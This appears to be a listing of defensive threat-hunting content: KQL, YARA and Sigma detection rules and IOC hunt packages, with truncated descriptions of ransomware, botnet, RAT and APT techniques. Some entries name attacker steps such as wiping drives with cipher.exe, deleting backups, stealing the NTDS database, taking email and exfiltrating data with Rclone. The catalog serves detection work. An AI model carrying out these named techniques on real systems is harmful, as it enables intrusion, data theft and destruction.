kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Cypherpunk ransomware leaves wake of tampered AVs. Cypherpunk is a human-operated ransomware campaign named after the unusual .cyphe
cypherpunk-remote-exec-w-psexesvc
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Cypherpunk ransomware leaves wake of tampered AVs. Cypherpunk is a human-operated ransomware campaign named after the unusual .cyphe
detect-cyzfc-activity (1)
kql medium
DeviceNetworkEvents
These queries was originally published in the threat analytics report, Attacks on gov't, think tanks, NGOs. As described further in Analysis of cyberattack on U.S. think tanks, non-profits, public sec
detect-cyzfc-activity (2)
kql medium
DeviceProcessEvents
These queries was originally published in the threat analytics report, Attacks on gov't, think tanks, NGOs. As described further in Analysis of cyberattack on U.S. think tanks, non-profits, public sec
detect-cyzfc-activity
kql medium
DeviceEventsDeviceFileEventsDeviceImageLoadEventsDeviceNetworkEventsDeviceProcessEventsDeviceRegistryEvents
These queries was originally published in the threat analytics report, Attacks on gov't, think tanks, NGOs. As described further in Analysis of cyberattack on U.S. think tanks, non-profits, public sec
detect-cyzfc-activity (3)
kql medium
DeviceProcessEvents
These queries was originally published in the threat analytics report, Attacks on gov't, think tanks, NGOs. As described further in Analysis of cyberattack on U.S. think tanks, non-profits, public sec
detect-cyzfc-activity (4)
kql medium
DeviceEventsDeviceFileEventsDeviceImageLoadEventsDeviceNetworkEventsDeviceProcessEventsDeviceRegistryEvents
These queries was originally published in the threat analytics report, Attacks on gov't, think tanks, NGOs. As described further in Analysis of cyberattack on U.S. think tanks, non-profits, public sec
droidian
yara low
YARA rule: droidian
Look for known Elliptic curve orders
yara low
Look for known Elliptic curve orders
fireeye-red-team-tools-CVEs [Nobelium]
kql medium
Search for the CVEs that should be prioritized and resolved to reduce the success of the FireEye Red Team tools compromised by the Nobelium activity group. See red_team_tool_countermeasures on the off
fireeye-red-team-tools-HASHs [Nobelium]
kql medium
DeviceFileEventsDeviceImageLoadEvents
This query searches for the HASHs of the FireEye Red Team tools compromised by the Nobelium activity group. See all-hashes.csv on the official FireEye repo. References: https://github.com/fireeye/red_
FlashNewfunction
yara low
YARA rule: FlashNewfunction
gtalocker
yara low
YARA rule: gtalocker
infostealer
yara low
YARA rule: infostealer
jagonca
yara low
YARA rule: jagonca
java-executing-cmd-to-run-powershell
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Sysrv botnet evolution. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptoc
JavaDeploymentToolkit
yara low
YARA rule: JavaDeploymentToolkit
kinsing-miner-download
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Sysrv botnet evolution. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptoc
known-affected-software-orion[Nobelium]
kql medium
This query was originally published in the threat analytics report, Solorigate supply chain attack. Please note that these attacks are currently known as the Nobelium campaign. Microsoft detects the 2
launching-base64-powershell[Nobelium]
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Solorigate supply chain attack. Please note that these attacks are currently known as the Nobelium campaign. Microsoft detects the 2
launching-cmd-echo[Nobelium]
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Solorigate supply chain attack. Please note that these attacks are currently known as the Nobelium campaign. Microsoft detects the 2
lenovo reaper
yara low
YARA rule: lenovo_reaper
locate-dll-created-locally[Nobelium]
kql medium
DeviceFileEvents
This query was originally published in the threat analytics report, Solorigate supply chain attack. Please note that these attacks are currently known as the Nobelium campaign. Microsoft detects the 2
locate-dll-loaded-in-memory[Nobelium]
kql medium
DeviceImageLoadEvents
This query was originally published in the threat analytics report, Solorigate supply chain attack. Please note that these attacks are currently known as the Nobelium campaign. Microsoft detects the 2
Malicious bat file
kql medium
DeviceFileEvents
ZLoader was delivered in a campaign in late summer 2021. This campaign was tweeted by @MsftSecIntel on twitter.
marcher
yara low
YARA rule: marcher
MSIETabularActivex
yara low
YARA rule: MSIETabularActivex
oracle-webLogic-executing-powershell
kql medium
DeviceFileEventsDeviceProcessEvents
This query was originally published in the threat analytics report, Sysrv botnet evolution. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptoc
Payload Delivery
kql medium
DeviceNetworkEvents
ZLoader was delivered in a campaign in summer 2021 via malvertising. This campaign was tweeted about by @MsftSecIntel on twitter.
pornlocker
yara low
YARA rule: pornlocker
potential CVE 2017 11882
yara low
YARA rule: potential_CVE_2017_11882
rce-on-vulnerable-server
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Sysrv botnet evolution. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptoc
Attempts to identify the exploit CVE 2017 11882
Attempts to identify the exploit CVE 2017 11882
SHA-3 (Keccak) round constants
yara low
SHA-3 (Keccak) round constants
SHA-3 (Keccak) interleaved round constants
Look for SipHash constants in big endian
slocker
yara low
YARA rule: slocker
Suspicious Registry Keys
kql medium
DeviceRegistryEvents
ZLoader was delivered in a campaign in late summer 2021 using malvertising to download malicious .msi files onto affected machines. This campaign was originally tweeted by @MsftSecIntel on Twitter. In
thoughtcrime
yara low
YARA rule: thoughtcrime
EmailEvents
Identify prior activity from this campaign using IOCs shared by Microsoft's Threat Intelligence Center, or MSTIC. Read more: https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphoru
EmailEvents
Identify prior activity from this campaign using IOCs shared by Microsoft's Threat Intelligence Center, or MSTIC. Read more: https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphoru
EmailEvents
Identify prior activity from this campaign using IOCs shared by Microsoft's Threat Intelligence Center, or MSTIC. Read more: https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphoru
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Kimwolf
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
ClearFake malware is designed to ex
ThreatFox: IClickFix IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 2 IOCs associated with IClickFix
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 2 IOCs associated with KongTuke
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 5 IOCs associated with SmartApeSG
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 34 IOCs associated with Unknown malware
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 7 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 3 IOCs associated with Cobalt Strike
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with DCRat
ThreatFox: Lumma Stealer IOCs
ioc-hunt high
DnsEvents
Hunt package for 16 IOCs associated with Lumma Stealer
ThreatFox: Meterpreter IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Meterpreter
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 22 IOCs associated with Nanocore RAT
ThreatFox: NjRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with NjRAT
ThreatFox: Phantom Stealer IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 5 IOCs associated with Phantom Stealer
ThreatFox: Quasar RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Quasar
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with Remcos
ThreatFox: Remus IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 12 IOCs associated with Remus
ThreatFox: SectopRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
SectopRAT is a remote access trojan that enables attackers to exfiltrate data, execute arbitrary commands, and maintain
ThreatFox: ValleyRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with ValleyRAT
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Vidar is a credential-stealing malware that exfiltrates sensitive data via encrypted channels and establishes persistence through scheduled tasks or registry entries. It typically arrives via phishing
tomcat-8-executing-powershell
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Sysrv botnet evolution. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptoc
unknown 1
yara low
The YARA rule 'unknown_1' detects potential unknown malware family artifacts, likely indicating suspicious files or behaviors. SOC teams should deploy this rule in endpoint EDR scanning, email gateway, and file share monitoring to identify and contain threats early.
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 28 malicious URLs tagged as 32-bit
URLhaus: BillGates Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as BillGates
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 49 malicious URLs tagged as ClearFake
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as Mozi
WastedLocker Downloader
kql medium
DeviceProcessEvents
This query identifies the launch pattern associated with wastedlocker ransomware. Reference writeup: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us
z3core
yara low
YARA rule: z3core
Alerts related to Log4j vulnerability
kql medium
Microsoft has observed attackers exploiting vulnerabilities associated with Log4J.
app-armor-stopped
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Sysrv botnet evolution. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptoc
Aria SBox 2
yara low
Aria SBox 2
Look for Base64 table
yara low
Look for Base64 table
BigDig bpInit
yara low
BigDig bpInit
BigDig mpModExp
yara low
BigDig mpModExp
BigDig mpModInv
yara low
BigDig mpModInv
BigDig mpModMult
yara low
BigDig mpModMult
BigDig mpModulo
yara low
BigDig mpModulo
BigDig spModExpB
yara low
BigDig spModExpB
BigDig spModInv
yara low
BigDig spModInv
BigDig spModMult
yara low
BigDig spModMult
Look for 128-bit key Chacha stream cipher constant
Look for 256-bit key Chacha stream cipher constant
CryptoPP ApplyFunction
yara low
CryptoPP ApplyFunction
CryptoPP Integer constructor
yara low
CryptoPP Integer constructor
CryptoPP RsaFunction
yara low
CryptoPP RsaFunction
Look for DCP Blowfish EncryptCBC
yara low
Look for DCP Blowfish EncryptCBC
Look for DCP Blowfish Init
yara low
Look for DCP Blowfish Init
Look for DCP Des EncryptECB
yara low
Look for DCP Des EncryptECB
Look for DCP Des Init
yara low
Look for DCP Des Init
Look for DCP RijnDael EncryptECB
yara low
Look for DCP RijnDael EncryptECB
Look for DCP RijnDael Init
yara low
Look for DCP RijnDael Init
deimos-component-execution
kql medium
DeviceEvents
Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization
Look for Compare string function
yara low
Look for Compare string function
Look for Copy function
yara low
Look for Copy function
Look for DecodeDate (DecodeDateFully) function
Look for Form.Show function
yara low
Look for Form.Show function
Look for IntToStr function
yara low
Look for IntToStr function
Look for Random function
yara low
Look for Random function
Look for RandomRange function
yara low
Look for RandomRange function
Look for StrToInt function
yara low
Look for StrToInt function
AlertEvidence
Microsoft has observed threat actors exploiting vulnerabilities associated with Log4J.
Disable Controlled Folders
kql medium
DeviceProcessEvents
Prior to deploying Macaw ransomware in an organization, the adversary will disable all controlled folders, which will enable them to be encrypted once the ransomware payload is deployed.
Dopplepaymer In-Memory Malware Implant
kql medium
DeviceProcessEvents
Dopplepaymer In-Memory Malware Implant. This query identifies processes with command line launch strings. Which match the pattern used in Dopplepaymer ransomware attacks.
Dragon Fly
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_dragonfly.yml. Questions via Twitter: @janvonkirchheim.
Elise backdoor
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_elise.yml. Questions via Twitter: @janvonkirchheim.
Equation Group C2 Communication
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_equationgroup_c2.yml. Questions via Twitter: @janvonkirchheim.
evasive-powershell-executions
kql medium
DeviceProcessEvents
Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization
evasive-powershell-strings
kql medium
DeviceProcessEvents
This query searches for a string pattern detected in evasive PowerShell usage. Jupyter or SolarMarker will iterate on this pattern multiple times to read data and call additional processes. This query
Excel launching anomalous processes
kql medium
DeviceProcessEvents
Use this query to find Excel launching anomalous processes congruent with Qakbot payloads which contain additional markers from recent Qakbot executions. The presence of such anomalous processes indic
FGint RsaSign
yara low
FGint RsaSign
General attempts to access local email store
kql medium
DeviceFileEvents
Use this query to find attempts to access files in the local path containing Outlook emails.
Hurricane Panda activity
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_hurricane_panda.yml. Questions via Twitter: @janvonkirchheim.
Identify EUROPIUM IOCs
kql medium
DeviceFileEvents
The following query can locate activity possibly associated with the EUROPIUM threat actor
AlertEvidence
This query looks for Microsoft Defender Antivirus detections related to EUROPIUM actor
DeviceProcessEvents
This query looks for identity add through exchange PowerShell
Imminent Ransomware
kql medium
DeviceProcessEvents
Directly prior to deploying Macaw ransomware in an organization, the attacker will run several commands designed to disable security tools and system recovery tools.
DeviceProcessEvents
Prior to deploying Macaw ransomware in an organization, the adversary will disable several tools and functions in order to inhibit later recovery efforts.
Judgement Panda exfil activity
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_judgement_panda_gtr19.yml. Questions via Twitter: @janvonkirchheim.
KNOTWEED-AV Detections
kql medium
AlertEvidence
'This query looks for Microsoft Defender Antivirus detections with the family names used by KNOTWEED'
DeviceRegistryEvents
'This query identifies modifications to COM registry keys to point to executable files in C:\Windows\System32\spool\drivers\color\'
KNOTWEED-Domain IOCs
kql medium
DeviceNetworkEvents
'This query identifies matches based on domain IOCs related to KNOTWEED against Microsoft Defender for Endpoint device network connections'
KNOTWEED-Downloading new file using Curl
kql medium
DeviceNetworkEvents
'This query looks for new files being downloaded using Curl.'
KNOTWEED-File Hash IOCs
kql medium
'This query identifies matches based on KNOTWEED file hash IOCs across Microsoft Defender for Endpoint tables'
DeviceFileEvents
'This query identifies modifications to COM registry keys to point to executable files in C:\Windows\System32\spool\drivers\color\'
LemonDuck-competition-killer
kql medium
DeviceProcessEvents
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LemonDuck-component-download-structure
kql medium
DeviceProcessEvents
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LemonDuck-component-names
kql medium
DeviceProcessEvents
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LemonDuck-control-structure
kql medium
DeviceNetworkEvents
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LemonDuck-defender-exclusions
kql medium
DeviceProcessEvents
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LemonDuck-email-subjects
kql medium
EmailEvents
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LemonDuck-id-generation
kql medium
DeviceNetworkEvents
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LemonDuck-registration-function
kql medium
DeviceEvents
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LockBox DecryptRsaEx
yara low
LockBox DecryptRsaEx
LockBox EncryptRsaEx
yara low
LockBox EncryptRsaEx
LockBox RsaEncryptFile
yara low
LockBox RsaEncryptFile
LockBox TlbRsaKey
yara low
LockBox TlbRsaKey
MacOceanLotusBackdoor
kql medium
DeviceProcessEvents
Backdoor processes associated with OceanLotus Mac Malware Backdoor. References:. Https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/. OS platform
MacOceanLotusDropper
kql medium
DeviceProcessEvents
Backdoor processes associated with OceanLotus Mac malware backdoor dropper. References:. Https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/. OS
Mass account password change
kql medium
DeviceProcessEvents
Prior to deploying Macaw ransomware in an organization, adversaries will change the password for hundreds or thousands of accounts in order to lock users out of the network and impeded recovery effort
Miracl Big constructor
yara low
Miracl Big constructor
Miracl mirsys init
yara low
Miracl mirsys init
Miracl mirvar
yara low
Miracl mirvar
OceanLotus registry activity
kql medium
DeviceRegistryEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_oceanlotus_registry.yml. Questions via Twitter: @janvonkirchheim.
OpenSSL BN_mod_exp_inverse
yara low
OpenSSL BN_mod_exp_inverse
OpenSSL BN_mod_exp_mont
yara low
OpenSSL BN_mod_exp_mont
OpenSSL BN_mod_exp_recp
yara low
OpenSSL BN_mod_exp_recp
OpenSSL BN_mod_exp_simple
yara low
OpenSSL BN_mod_exp_simple
OpenSSL BN_mod_exp2_mont
yara low
OpenSSL BN_mod_exp2_mont
OpenSSL DSA
yara low
YARA rule: OpenSSL_DSA
YARA rule: pkcs8_private_key_information_syntax_standard
PSExec Attrib commands
kql medium
DeviceProcessEvents
Prior to deploying Macaw ransomware in an organization, adversaries wil use Attrib to display file attribute information on multiple drives and all subfolders.
Qakbot Craigslist Domains
kql medium
DeviceNetworkEvents
Qakbot operators have been abusing the Craigslist messaging system to send malicious emails. These emails contain non-clickable links to malicious domains impersonating Craigslist, which the user is i
Qakbot email theft (1)
kql medium
DeviceFileEvents
Use this query to find email stealing activities ran by Qakbot that will use "ping.exe -t 127.0.0.1" to obfuscate subsequent actions. Email theft that occurs might be exfiltrated to operators and indi
Qakbot email theft
kql medium
DeviceFileEvents
Use this query to find email stealing activities ran by Qakbot that will use "ping.exe -t 127.0.0.1" to obfuscate subsequent actions. Email theft that occurs might be exfiltrated to operators and indi
Qakbot reconnaissance activities
kql medium
DeviceProcessEvents
Use this query to find reconnaissance and beaconing activities after code injection occurs. Reconnaissance commands are consistent with the current version of Qakbot and occur automatically to exfiltr
DeviceProcessEvents
Find use of Alternate Data Streams (ADS) for anti-forensic purposes. Alternate Data Streams execution.
Ransomware hits healthcare - Backup deletion
kql medium
AlertEvidence
Adversaries are likely attempting to delete backup files in healthcare environments to eliminate recovery options
DeviceProcessEvents
// Look for cipher.exe deleting data from multiple drives. This is often performed as an anti-forensic measure prior to encryption.
DeviceProcessEvents
// Look for attempts to use fsutil.exe to delete file system logs that can be used as forensic artifacts.
AlertEvidenceDeviceLogonEvents
Identify accounts that have logged on to affected endpoints. Check for specific alerts.
DeviceProcessEvents
Find distinct evasion and execution activities. Associated with the Robbinhood ransomware campaign.
DeviceProcessEvents
Find attempts to stop System Restore and. Prevent the system from creating restore points.
DeviceFileEvents
Locate vulnerable Gigabyte drivers used by RobbinHood ransomware to turn off security tools.
RijnDael AES
yara low
RijnDael AES
RijnDael AES (check2) [char]
yara low
RijnDael AES (check2) [char]
RijnDael AES S-inv [char]
yara low
RijnDael AES S-inv [char]
RsaEuro NN_modInv
yara low
RsaEuro NN_modInv
RsaEuro NN_modMult
yara low
RsaEuro NN_modMult
RsaRef2 NN_modExp
yara low
RsaRef2 NN_modExp
RsaRef2 NN_modInv
yara low
RsaRef2 NN_modInv
RsaRef2 NN_modMult
yara low
RsaRef2 NN_modMult
RsaRef2 RsaPrivateDecrypt
yara low
RsaRef2 RsaPrivateDecrypt
RsaRef2 RsaPrivateEncrypt
yara low
RsaRef2 RsaPrivateEncrypt
RsaRef2 RsaPublicDecrypt
yara low
RsaRef2 RsaPublicDecrypt
RsaRef2 RsaPublicEncrypt
yara low
RsaRef2 RsaPublicEncrypt
Star Blizzard-Domain IOCs
kql high
T1566
DeviceNetworkEvents
'This query identifies matches based on domain IOCs related to Star Blizzard against Microsoft Defender for Endpoint device network connections'
StrRAT-AV-Discovery
kql medium
DeviceProcessEvents
StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and take remote control of infected systems. It also has a module to download additional payload onto to the
StrRAT-Email-Delivery
kql medium
EmailUrlInfo
StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and take remote control of infected systems. It also has a module to download additional payload onto to the
StrRAT-Malware-Persistence
kql medium
DeviceProcessEvents
StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and take remote control of infected systems. It also has a module to download additional payload onto to the
successive-tk-domain-calls
kql medium
DeviceNetworkEvents
Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization
Suspicious JScript staging comment
kql medium
DeviceProcessEvents
Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability utilizing identifiable strings in PowerShell commands.
Suspicious PowerShell curl flags
kql medium
DeviceProcessEvents
Attackers may use unconventional PowerShell curl flags
DeviceProcessEvents
Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability utilizing the ws_TomcatService.exe process to launch malicious processes.
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 95 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DeviceFileEventsUrlClickEvents
Hunt package for 3 IOCs associated with KongTuke
ThreatFox: SmartApeSG IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 8 IOCs associated with SmartApeSG
ThreatFox: Unknown malware IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 100 IOCs associated with Unknown malware
ThreatFox: Unknown RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 5 IOCs associated with Unknown RAT
ThreatFox: Amadey IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 3 IOCs associated with Amadey
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 6 IOCs associated with Cobalt Strike
ThreatFox: Lumma Stealer IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 2 IOCs associated with Lumma Stealer
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 5 IOCs associated with Nanocore RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 9 IOCs associated with Remcos
ThreatFox: Stealc IOCs
ioc-hunt high
UrlClickEvents
The Stealc malware is a data exfiltration tool designed to steal sensitive information such as credentials and system data from infected hosts. It typically arrives via phishing emails or malicious websites containing malicious URLs that download and execute the payload. SOC analysts should monitor for unusual outbound traffic patterns, unexpected data transfers, and signs of lateral movement or command-and-control communication beyond the identified URLs.
ThreatFox: ValleyRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with ValleyRAT
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 4 IOCs associated with Vidar
Look for Random function
yara low
Look for Random function
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 17 malicious URLs tagged as 32-bit
URLhaus: arm Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 8 malicious URLs tagged as arm
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 51 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 18 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as mirai
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as Mozi
URLhaus: ua-wget Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 12 malicious URLs tagged as ua-wget
Use of MSBuild as LOLBin
kql medium
DeviceProcessEvents
Prior to deploying Macaw ransomware in an organization, the adversary frequently uses MSBuild.exe as a LOLBin to communicate with the C2.
Look for Random function
yara low
Look for Random function
Look for Random function
yara low
Look for Random function
x509 public key infrastructure cert
yara low
YARA rule: x509_public_key_infrastructure_cert
Indirect Command Execution via SFTP ProxyCommand
sigma medium
T1202
imProcessCreate
Detects the use of SFTP.exe to execute commands indirectly via ProxyCommand parameter. Threat actors were seen leveraging this legitimate Windows binary to bypass security controls and execute arbitra
Abuse.ch Recent Threat Feed (1)
kql medium
DeviceFileEventsDeviceImageLoadEventsDeviceProcessEvents
This query will hunt for files matching the current abuse.ch recent threat feed based on Sha256. Currently the query is set up to analyze the last day worth of events, but this is configurable using t
Abuse.ch Recent Threat Feed
kql medium
DeviceFileEventsDeviceImageLoadEventsDeviceProcessEvents
This query will hunt for files matching the current abuse.ch recent threat feed based on Sha256. Currently the query is set up to analyze the last day worth of events, but this is configurable using t
Abusing settingcontent-ms
kql medium
DeviceFileEvents
Sample query that search for .settingcontent-ms that has been downloaded from the web. Through Microsoft Edge, Internet Explorer, Google Chrome, Mozilla Firefox, Microsoft Outlook. For questions @Mila
APT Baby Shark
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_babyshark.yml. Questions via Twitter: @janvonkirchheim.
APT29 thinktanks
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_apt29_thinktanks.yml. Questions via Twitter: @janvonkirchheim.
Bazacall Emails
kql medium
EmailEvents
Bazacall malware uses emails that contain a phone number for the user to call in order to cancel a fake subscription. These emails contain no links or attachments, and use automatic payment lures to t
Bear Activity GTR 2019
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_bear_activity_gtr19.yml. Questions via Twitter: @janvonkirchheim.
Cloud Hopper
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_cloudhopper.yml. Questions via Twitter: @janvonkirchheim.
Cobalt Strike Lateral Movement
kql medium
AlertEvidence
Microsoft has observed Bazacall using Cobalt Strike in order to move laterally to other machines on the network.
DES [long]
yara low
DES [long]
DES [pbox] [long]
yara low
DES [pbox] [long]
DES [sbox]
yara low
DES [sbox]
DofoilNameCoinServerTraffic
kql medium
DeviceNetworkEvents
This is a query to retrieve last 30 days network connections to known Dofoil NameCoin servers. The full article is available here: https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-d
Dropping payload via certutil
kql medium
DeviceFileEvents
BazaCall is a campaign that manipulate users into calling a customer support center, where they are instructed to download an Excel file to unsubscribe from a phony service. When the user opens the Ex
Excel file download domain pattern
kql medium
DeviceNetworkEvents
BazaCall is a campaign that manipulate users into calling a customer support center, where they are instructed to download an Excel file to unsubscribe from a phony service. When the user opens the Ex
Excel Macro Execution
kql medium
DeviceProcessEvents
Bazacall uses malicious macro-enabled Excel documents to execute their payload.
FGint Base256StringToGInt
yara low
FGint Base256StringToGInt
FGint ConvertBase256StringToHexString
FGint ConvertBase256to64
yara low
FGint ConvertBase256to64
FGint ConvertHexStringToBase256String
FGint DSAPrimeSearch
yara low
FGint DSAPrimeSearch
FGint DSASign
yara low
FGint DSASign
FGint DSAVerify
yara low
FGint DSAVerify
FGint ECAddPoints
yara low
FGint ECAddPoints
FGint ECElGamalEncrypt
yara low
FGint ECElGamalEncrypt
FGint ECPointDestroy
yara low
FGint ECPointDestroy
FGint ECPointKMultiple
yara low
FGint ECPointKMultiple
FGint FGIntToBase256String
yara low
FGint FGIntToBase256String
FGint FindPrimeGoodCurveAndPoint
yara low
FGint FindPrimeGoodCurveAndPoint
FGint PGPConvertBase256to64
yara low
FGint PGPConvertBase256to64
FGint RsaDecrypt
yara low
FGint RsaDecrypt
FGint RSAEncrypt
yara low
FGint RSAEncrypt
FGint RSAVerify
yara low
FGint RSAVerify
Malicious Excel Delivery
kql medium
DeviceFileEvents
Bazacall uses malicious Excel files to execute payloads on affected devices.
NTDS theft
kql medium
DeviceProcessEvents
Microsoft has observed compromises related to Bazacall resulting in theft of the Active Directory database using ntdsutil.exe.
Renamed Rclone Exfil
kql medium
